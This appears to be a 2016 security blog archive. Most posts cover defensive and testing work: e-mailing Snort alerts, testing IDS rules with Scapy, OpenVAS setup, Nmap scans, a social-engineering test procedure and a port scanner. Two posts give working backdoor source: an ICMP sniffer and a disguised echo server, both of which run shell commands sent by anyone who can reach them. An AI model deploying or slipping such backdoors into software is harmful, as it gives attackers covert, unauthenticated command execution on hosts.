Monday, December 26, 2016

Send Snort alerts through emails from Syslog

#!/usr/bin/perl -w
#Add the line below (without the leading '#') to /etc/rsyslog.conf
#and restart the rsyslog service so that it forwards to this listener.
#*.* @127.0.0.1:88
use Net::Syslogd;
use IO::Socket;
$| = 1;   # unbuffered STDOUT so printed alert lines appear immediately

# Deployment settings; edit these before running.
our $email_server   = '192.168.0.100';   # SMTP relay reached on port 25, no AUTH/TLS in sendmail()
our $email_domain   = 'local.mail.com';  # name announced in the HELO command
our $email_sender   = 'sender@mail.com';
our $email_receiver = 'receiver@mail.com';
our $syslogd_port   = 88;                # port the rsyslog "*.* @127.0.0.1:88" line forwards to

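sub sendmail($$){
    # Deliver one alert by speaking a minimal SMTP dialogue to $email_server:25.
    #
    # Arguments: $content (message body) and $subject (subject line). Both are
    # built from syslog text received off the network, so they are sanitised
    # before being written to the SMTP stream. Dies if the TCP connection cannot
    # be opened (as the original did); SMTP reply codes are read but not checked.
    my $content = shift;
    my $subject = shift;
    my $reply;

    my $sock = IO::Socket::INET->new(PeerAddr => $email_server,
                                     PeerPort => 25,
                                     Proto    => 'tcp') || die "Cannot create Socket!\n";

    # A CR/LF inside a header value would let a syslog message inject extra
    # mail headers, so fold the subject onto one line.
    $subject =~ s/[\r\n]+/ /g;

    # RFC 5321: body lines end in CRLF, and a line beginning with "." must be
    # dot-stuffed so that it cannot terminate the DATA section early.
    $content =~ s/\r?\n/\r\n/g;
    $content =~ s/^\./../mg;

    # Consume the server greeting before issuing the first command.
    $sock->recv($reply, 100, 0);
    # The original sent "HELO" directly followed by the domain (no space),
    # which is a malformed command.
    $sock->send("HELO ".$email_domain."\r\n");
    $sock->recv($reply, 100, 0);
    $sock->send("MAIL FROM:<".$email_sender.">\r\n");
    $sock->recv($reply, 100, 0);
    $sock->send("RCPT TO:<".$email_receiver.">\r\n");
    $sock->recv($reply, 100, 0);
    $sock->send("DATA\r\n");
    $sock->recv($reply, 100, 0);
    $sock->send("From: ".$email_sender."\r\n");
    $sock->send("To: ".$email_receiver."\r\n");
    $sock->send("Subject: ".$subject."\r\n\r\n");
    # Body followed by the end-of-data marker on a line of its own.
    $sock->send($content."\r\n.\r\n");
    $sock->recv($reply, 100, 0);
    $sock->send("QUIT\r\n");
    $sock->recv($reply, 100, 0);

    $sock->close();
}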

# Listen for forwarded syslog datagrams and e-mail every line that looks like
# a Snort alert.
my $syslogd = Net::Syslogd->new(LocalPort => $syslogd_port)
    or die "Error creating Syslogd listener: ", Net::Syslogd->error;

while (1) {
    my $message = $syslogd->get_message();

    # undef: the listener itself failed (fatal); 0: nothing usable arrived.
    unless (defined $message) {
        printf "$0: %s\n", Net::Syslogd->error;
        exit 1;
    }
    next if $message == 0;

    unless (defined $message->process_message()) {
        printf "$0: %s\n", Net::Syslogd->error;
        next;
    }

    # One tab-separated line per datagram; this is both what is printed and
    # what becomes the e-mail body.
    my @fields = (
        $message->remoteaddr,
        $message->remoteport,
        $message->facility,
        $message->severity,
        $message->time,
        $message->hostname,
        $message->message,
    );
    my $syslog_content = sprintf "%s\t%i\t%s\t%s\t%s\t%s\t%s\n", @fields;

    # Only Snort alert lines are forwarded; the third capture (the rule's msg
    # text) is used as the e-mail subject.
    next unless $message->message =~ /snort(.*): \[(.*)\] (.*) \[Classification:/;
    my $alert = $3;

    print $syslog_content;
    &sendmail($syslog_content, $alert);
}

Sunday, December 11, 2016

An example regarding Scapy scripts

#!/usr/bin/python
from scapy.all import *

# Interactive helper: wrap a user-supplied string in an ICMP echo request and
# send it to the given address (used to trigger a content-matching IDS rule).
target_ip = raw_input("Target IP : ")
payload = raw_input("Content : ")

probe = IP(dst=target_ip) / ICMP() / payload
send(probe)
print "Sending the ICMP packet..."

print "Done!"

Test Suricata through Scapy

The suricata.yaml configuration references a newly added rule file named alex.rules:
root@LinuxTest:~# cat /etc/suricata/suricata.yaml|grep rules
## Step 2: select the rules to enable or disable
default-rule-path: /etc/suricata/rules
- emerging-all.rules
- app-layer-events.rules
- files.rules
- stream-events.rules
- decoder-events.rules
- http-events.rules
- tls-events.rules
- dns-events.rules
#- modbus-events.rules
- smtp-events.rules
- alex.rules



The content of the alex.rules
alert icmp any any -> any any (content:"|64656D6F6E616C6578|"; msg:"Show demonalex"; sid:1000888;)



Run Suricata
root@LinuxTest:~# suricata -c /etc/suricata/suricata.yaml -i eth0



Launch a test case through Scapy:
>>> b=IP(dst='184.0.172.222')/ICMP()/'demonalex';send(b)
.
Sent 1 packets.



Check the alert of Suricata
root@LinuxTest:~# tail -n 10 -f /var/log/suricata/fast.log
12/11/2016-15:47:22.255835  [**] [1:1000888:0] Show demonalex [**] [Classification: (null)] [Priority: 3] {ICMP} 184.0.1.189:8 -> 184.0.172.222:0
12/11/2016-15:47:22.256266  [**] [1:1000888:0] Show demonalex [**] [Classification: (null)] [Priority: 3] {ICMP} 184.0.172.222:0 -> 184.0.1.189:0

Some notes regarding testing Snort through Scapy

The rule for testing the NIDS engine:
alert icmp any any -> any any (content:"|64656D6F6E616C6578|"; msg:"Show demonalex"; sid:1000888;)



Launch a test case through Scapy:
>>> a=IP(dst='192.168.172.222')/ICMP()/"demonalex"
>>> send(a)



Tcpdump monitoring the conversation:
root@LinuxTest:/etc/snort/rules# tcpdump -i eth0 -Avv host 192.168.172.222 and icmp
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
15:05:28.450743 IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto ICMP (1), length 37)
    dynamic.dsl.skybest.com > xxxxxxxxxxx.local: ICMP echo request, id 0, seq 0, length 17
E..%....@.\;...........c....demonalex
15:05:28.451176 IP (tos 0x0, ttl 127, id 21335, offset 0, flags [none], proto ICMP (1), length 37)
    xxxxxxxxxxx.local > dynamic.dsl.skybest.com: ICMP echo reply, id 0, seq 0, length 17
E..%SW.................c....demonalex.........



Corresponding Snort Log:
root@LinuxTest:~# tail -n 10 -f /var/log/snort/alert
[**] [1:1000888:0] Show demonalex [**]
[Priority: 0]
12/09-15:23:37.880520 192.168.1.189 -> 192.168.172.222
ICMP TTL:64 TOS:0x0 ID:1 IpLen:20 DgmLen:37
Type:8  Code:0  ID:0   Seq:0  ECHO

[**] [1:1000888:0] Show demonalex [**]
[Priority: 0]
12/09-15:23:37.881118 192.168.172.222 -> 192.168.1.189
ICMP TTL:127 TOS:0x0 ID:3121 IpLen:20 DgmLen:37
Type:0  Code:0  ID:0  Seq:0  ECHO REPLY

[**] [1:408:5] ICMP Echo Reply [**]
[Classification: Misc activity] [Priority: 3]
12/09-15:23:37.881118 192.168.172.222 -> 192.168.1.189
ICMP TTL:127 TOS:0x0 ID:3121 IpLen:20 DgmLen:37
Type:0  Code:0  ID:0  Seq:0  ECHO REPLY

Sunday, December 4, 2016

Officially update feeds for OSSIM or USM.

Directly Quoted from: https://www.alienvault.com/documentation/usm-v5/ids-configuration/updating-alienvault-nids-rules.htm

To install threat intelligence updates using the web interface
  1. Navigate to Configuration > Deployment > Components > AlienVault Center.
  2. Click the yellow arrow in the New Updates column next to the USM appliance you want to install the updates on.
  3. Examine the available updates.
    NIDS updates contain “suricata” in the package name.
  4. Click Update Feed Only.
    Note: This updates signatures and rules for all packages listed in the update summary, not just the IDS signatures.
The upgrade process can take several minutes. After completion, the page displays a message indicating a successful update.
To install threat intelligence updates in the AlienVault Setup Menu
  1. Launch the AlienVault console.
  2. Select System Preferences; press Enter (<OK>).
  3. Select Update AlienVault System; press Enter (<OK>).
  4. Select Update Threat Intelligence; press Enter (<OK>).
  5. Confirm your selection.
    Note: The AlienVault console does not show the list of available updates, but you can check the update progress.
The upgrade process can take several minutes. After completion, the console displays a message indicating a successful update.

Manually update the NVT through Shell

1) Execute the command below in order to update the NVTs. Note that proxy credentials given on the command line end up in the shell history and are visible to other local users in the process list, so prefer exporting http_proxy from a file with restricted permissions.
root@LinuxTest:~# http_proxy="http://USERNAME:PASSWORD@PROXYIP:PORT/" /usr/sbin/openvas-nvt-sync --wget
2) Restart the scanner (openvassd) by executing one of the following commands so that the new plugins are reloaded into it.
root@LinuxTest:~# /usr/bin/openvas-stop && /usr/bin/openvas-start
OR:
alienvault:/usr/local/sbin/crond# /usr/bin/killall -HUP openvassd

3) To check whether all new plugins have been imported, the "ps" command can be used; openvassd reports its reload progress in its process title.
root@LinuxTest:~# ps -aef|grep open
root     28135     1  0 13:33 ?        00:00:00 openvasmd
root     28152     1 98 13:33 ?        00:01:05 openvassd: Reloaded 50450 of 50527 NVTs (99% / ETA: 00:00)
root     28155 28152  0 13:33 ?        00:00:00 openvassd (Loading Handler)
root     28231 21831  0 13:34 pts/0    00:00:00 grep open

4) Furthermore, as shown in the example below, "openvas-check-setup" can be used to check the status.
root@LinuxTest:~# /usr/bin/openvas-check-setup

Friday, December 2, 2016

Using NMAP to test the Screening functionality within the NetScreen platform.

The nmap command below is able to determine whether or not the Screening functionality works properly.

nmap -v --min-rate 3000 --max-rate 3000 -sS 192.168.0.1-253

Please refer to https://nmap.org/book/man-performance.html to get more details.

Send SYSLOG to remote servers through Snort being hosted on Kali

root@LinuxTest:~# snort -V

   ,,_     -*> Snort! <*-
  o"  )~   Version 2.9.7.0 GRE (Build 149)
   ''''    By Martin Roesch & The Snort Team: http://www.snort.org/contact#team
           Copyright (C) 2014 Cisco and/or its affiliates. All rights reserved.
           Copyright (C) 1998-2013 Sourcefire, Inc., et al.
           Using libpcap version 1.8.1
           Using PCRE version: 8.39 2016-06-14
           Using ZLIB version: 1.2.8


root@LinuxTest:~# cat /etc/rsyslog.conf|grep '*.*'|grep 514|grep -v '#'
*.*                             @192.168.0.1:514

root@LinuxTest:~# cat /etc/snort/snort_syslog.conf|grep syslog|grep -v '#'
output alert_syslog: host=192.168.0.1:514, LOG_LOCAL1 LOG_ALERT

root@LinuxTest:~# ps -aef|grep snort
root      8709     1  0 01:59 ?        00:00:02 /usr/sbin/snort -c /etc/snort/snort_syslog.conf -i eth0 -A full -D -s

P.S.: In this case, 192.168.0.1 is the remote syslog server. Note that the "*.* @192.168.0.1:514" line forwards every log message, not only the Snort alerts, over unencrypted UDP. Moreover, once everything above is configured, the system must be rebooted; otherwise rsyslogd may not function properly.

Wednesday, November 16, 2016

Configure the binded IP of OpenVAS

1) Go to the corresponding folder:
cd /lib/systemd/system

2) Change the loopback address to the wildcard address 0.0.0.0 (this exposes the services on every interface, so restrict who can reach them with a firewall):
sed -e 's/127.0.0.1/0.0.0.0/g' greenbone-security-assistant.service openvas-manager.service openvas-scanner.service -i

3) Let the system reload all configuration:
systemctl daemon-reload

4) Restart the corresponding services:
systemctl restart greenbone-security-assistant.service openvas-manager.service openvas-scanner.service

5) Check all ports:
ss -nalt

Monday, October 10, 2016

Utilizing Nmap to launch a vulnerability scanning.


First, update your NSE database through executing the command below.
nmap --script-updatedb

Second, enable the vulnerability scanning functionality by adding the -sC argument, as shown below.

nmap -sC 192.168.0.1

A procedure regarding Social Engineering Test in my opinion.

The Social Engineering test’s procedure, which is similar to the technical test, is also composed of five steps, namely Reconnaissance, Confirmation, Implementation, Analysis, Report. Here is the detail of each step:
1) Reconnaissance: Use social platforms such as Google and LinkedIn to locate candidates who may become test targets.
2) Confirmation: Confirm the test methodologies and the individuals to be targeted with the client before documenting the test plan. Bear in mind that the client should not know the precise time frame of the implementation in advance, so that the client's incident response ability can be assessed.
3) Implementation: Launch the SE test in accordance with the aforementioned test plan; record every reaction from the targets during the implementation.
4) Analysis: Analyze the reactions. Normally, the client's incident response team will confirm the situation with the SE team.
5) Report: Write the analysis report once the SE test is finished, and submit it before holding a meeting to discuss the result in detail.



Saturday, October 8, 2016

Free traditional vulnerability scanners

When fuzz-based scanning such as SQL injection and XSS scanning cannot be carried out for some reason, traditional vulnerability scanning becomes more important, because it lets penetration testers find as many vulnerabilities in the targets as possible. Some free traditional vulnerability scanners are listed below.


  • OpenVAS
  • Armitage (based on Metasploit Framework)
  • Sparta (based on Nmap and Nikto)

I hope readers can suggest more names. Thank you.

Saturday, October 1, 2016

An ICMP backdoor written recently.

#!/usr/bin/python
#Written by demonalex on Oct 1, 2016
#PoC with Scapy: send(IP(dst="192.168.0.3")/ICMP()/"cmd echo 1 > c:\test.txt")
import socket, re, sys, subprocess

host = socket.gethostname()

#A sniffer dedicated to ICMP
# NOTE(review): proof-of-concept trap door, not something to deploy. A raw
# ICMP socket is bound to the address the host name resolves to, and the
# SIO_RCVALL / RCVALL_ON ioctl (Windows-only) switches the interface into
# "receive all" mode; opening a raw socket normally needs administrator rights.
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP)
s.bind((host,0))

s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)

s.ioctl(socket.SIO_RCVALL, socket.RCVALL_ON)
#A sniffer dedicated to ICMP

while 1:
# receive a package
    # recvfrom() returns a (data, address) tuple; the regex below is run on
    # str() of that tuple, which is why the pattern ends in the literal
    # "', ('" that separates the data from the address in the tuple's repr.
    icmp_packet = s.recvfrom(65535)
    ipacket=str(icmp_packet)
    #print type(ipacket), ":", ipacket
    try:
        # Whatever follows "cmd " in the ICMP payload is handed to a shell,
        # with no authentication and no logging. From a defender's point of
        # view the indicator is an ICMP echo whose payload carries "cmd " --
        # the same kind of payload content match the Snort/Suricata rules
        # elsewhere on this page use.
        matchstr = re.search(r'cmd (.*)\', \(\'', ipacket, re.M|re.I)
        if matchstr:
            #print matchstr.group(1)
            command = matchstr.group(1)
            # check_output raises CalledProcessError on non-zero exit; the
            # output itself is discarded.
            subprocess.check_output(command, shell=True)
            #print "Executed \'", command, "\'"
    except:
        # Bare except hides every error raised while matching or executing,
        # including a KeyboardInterrupt that happens during the command.
        print "Execution failed."
        continue

# disabled promiscuous mode
# The loop above has no break, so this line is only skipped, never reached:
# an exception escaping the loop terminates the script before it.
s.ioctl(socket.SIO_RCVALL, socket.RCVALL_OFF)

Thursday, September 29, 2016

Simple TCP Scanner

#!/usr/bin/python
# Written in September, 2016 for fun.
import socket, sys

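# Ports probed with a plain TCP connect(); edit to taste.
port_list = [7, 8, 9, 21, 22, 23, 80, 135, 139, 443, 445, 1025]

# The host comes from argv[1], falling back to an interactive prompt. Only
# IndexError is caught (the original used a bare except) so that any other
# error stays visible.
try:
    host = sys.argv[1]
except IndexError:
    host = raw_input("Scanned Host: ")

for port in port_list:
    s = socket.socket()
    try:
        # connect_ex() returns 0 on success or an errno value otherwise; any
        # non-zero value (refused, filtered, unreachable) is reported as
        # "closed". The local was named `re` originally, which shadows the
        # stdlib module of that name.
        status = s.connect_ex((host, port))
        if status == 0:
            print host, ":", port, "is open!"
        else:
            print host, ":", port, "is closed!"
    finally:
        # Release the socket even if connect_ex() raises (e.g. on a name
        # resolution failure), which previously leaked it.
        s.close()

print "Done!"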

An echo server with a trap door

#!/usr/bin/python
#Written in August, 2016 with wwiinngd's help
import sys, socket, subprocess, re

# NOTE(review): an "echo" service with a hidden command channel, written as a
# trap-door demonstration. Everything below is plaintext and unauthenticated:
# any client that can reach the port can use both the echo and the command path.
s = socket.socket()
host = socket.gethostname()
port = 7   # the well-known echo port, so the listener looks like a normal echo service
s.bind((host, port))
s.listen(5)
while True:
    c, addr = s.accept()
    print('Client: ', addr)   # Python 2: prints the tuple as-is
    while True:
        c.send("request (type \"quit\" to quit): ")
        # An empty recv() (client went away) is not handled: the loop keeps
        # sending the prompt until send() raises, and the unhandled exception
        # then terminates the whole server.
        request = c.recv(1024)
        if (request == "quit\n"):
            c.close()
            del c
            break
        #Backdoor function starts
        # A request starting with "cmd " is executed through the shell and its
        # output sent back; the echoed request is then overwritten with "test",
        # so the normal reply line never contains the command. For detection,
        # the fixed prompt string above and "reply: test" in the response are
        # the observable artefacts of this implementation.
        match = re.search(r'^cmd (.*)', request, re.M|re.I)
        if match:
            request = "test\n"
            command = match.group(1)
            try:
                # check_output raises CalledProcessError on a non-zero exit,
                # in which case nothing but the echo reply reaches the client.
                output = subprocess.check_output(command, shell=True)
                c.send(output)
            except:
                # Bare except: every failure, including a broken client
                # connection during send(), is reported the same way.
                print "Subprocess is malfunctioning."
        #Backdoor function ends
        print request
        c.send("reply: " + request)
# Not reached in normal operation: the accept loop above has no exit.
s.close()    

Tuesday, September 27, 2016